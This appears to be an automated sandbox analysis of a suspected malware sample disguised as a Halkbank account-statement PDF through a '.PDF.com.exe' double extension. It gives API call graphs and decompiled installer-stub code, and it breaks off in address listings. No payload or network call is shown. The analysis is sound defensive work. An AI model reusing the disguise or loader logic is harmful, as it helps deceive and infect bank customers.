3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                          Executed Functions

                                          Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                          C-Code - Quality: 78%
                                          			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\hardz\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\hardz\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                          0x0040364e
                                          0x0040364f
                                          0x00403656
                                          0x00403659
                                          0x00403660
                                          0x00403663
                                          0x00403676
                                          0x0040367c
                                          0x0040367f
                                          0x00403682
                                          0x00403690
                                          0x00403698
                                          0x004036a3
                                          0x004036bc
                                          0x004036be
                                          0x004036c6
                                          0x004036c6
                                          0x004036d1
                                          0x004036d3
                                          0x004036d3
                                          0x004036e8
                                          0x0040370d
                                          0x0040371b
                                          0x0040371e
                                          0x00403725
                                          0x0040372c
                                          0x0040372c
                                          0x00403725
                                          0x0040372e
                                          0x00403733
                                          0x00403734
                                          0x00403740
                                          0x00403744
                                          0x0040374b
                                          0x00403759
                                          0x0040375e
                                          0x00403765
                                          0x00403769
                                          0x0040376d
                                          0x0040376f
                                          0x0040376f
                                          0x0040376d
                                          0x00403776
                                          0x0040377d
                                          0x00403783
                                          0x0040379b
                                          0x004037ab
                                          0x004037b0
                                          0x004037b6
                                          0x004037bd
                                          0x004037c4
                                          0x004037c6
                                          0x004037c7
                                          0x004037d1
                                          0x004037d8
                                          0x004037da
                                          0x004037dc
                                          0x004037dc
                                          0x004037ef
                                          0x004037f1
                                          0x004038eb
                                          0x004038eb
                                          0x004038ee
                                          0x004038f1
                                          0x00000000
                                          0x00000000
                                          0x004037fb
                                          0x004037fc
                                          0x004037ff
                                          0x00403808
                                          0x00403808
                                          0x0040380b
                                          0x0040380e
                                          0x00403811
                                          0x00403814
                                          0x00403814
                                          0x00403814
                                          0x00403815
                                          0x00403819
                                          0x004038d9
                                          0x004038e2
                                          0x004038e4
                                          0x004038e7
                                          0x004038ea
                                          0x004038ea
                                          0x004038ea
                                          0x00000000
                                          0x0040381f
                                          0x00403820
                                          0x00403821
                                          0x00403825
                                          0x0040383f
                                          0x00403846
                                          0x00403859
                                          0x0040385a
                                          0x0040386f
                                          0x00403874
                                          0x00403876
                                          0x00403878
                                          0x00403894
                                          0x0040389b
                                          0x004038ae
                                          0x004038af
                                          0x004038c4
                                          0x004038ca
                                          0x004038cc
                                          0x004038ce
                                          0x004038d6
                                          0x004038d8
                                          0x00000000
                                          0x004038d8
                                          0x004038d2
                                          0x004038d4
                                          0x004038f9
                                          0x004038fd
                                          0x00403906
                                          0x0040390b
                                          0x00403911
                                          0x0040391c
                                          0x0040391e
                                          0x00403923
                                          0x00403925
                                          0x0040397d
                                          0x00403982
                                          0x0040398b
                                          0x00403992
                                          0x00403995
                                          0x00403b6c
                                          0x00403b6c
                                          0x00403b71
                                          0x00403b7a
                                          0x00403b97
                                          0x00403c0f
                                          0x00403c0f
                                          0x00403c17
                                          0x00403c19
                                          0x00403c19
                                          0x00403c1f
                                          0x00403c1f
                                          0x00403bae
                                          0x00403bba
                                          0x00403bcb
                                          0x00403bd2
                                          0x00403bd9
                                          0x00403bd9
                                          0x00403be1
                                          0x00403bed
                                          0x00403bfb
                                          0x00403c06
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403bef
                                          0x00403bef
                                          0x00403bf0
                                          0x00403bf2
                                          0x00403bf3
                                          0x00403bf4
                                          0x00403bf9
                                          0x00403c08
                                          0x00403c0a
                                          0x00000000
                                          0x00403c0a
                                          0x00000000
                                          0x00403bf9
                                          0x00403bed
                                          0x00403b84
                                          0x00403b8b
                                          0x00403b8b
                                          0x004039a1
                                          0x00403a48
                                          0x00403a48
                                          0x00403a54
                                          0x00000000
                                          0x00403a54
                                          0x004039b2
                                          0x004039ba
                                          0x00403a0c
                                          0x00403a0c
                                          0x00403a12
                                          0x00403a19
                                          0x00403a67
                                          0x00403a69
                                          0x00403a6e
                                          0x00403a70
                                          0x00403a78
                                          0x00403a78
                                          0x00403a83
                                          0x00403a88
                                          0x00403a8f
                                          0x00403a95
                                          0x00403a97
                                          0x00403b6a
                                          0x00403b6a
                                          0x00403b6a
                                          0x00000000
                                          0x00403a9d
                                          0x00403a9d
                                          0x00403a9f
                                          0x00403aa0
                                          0x00403aa9
                                          0x00403aa2
                                          0x00403aa2
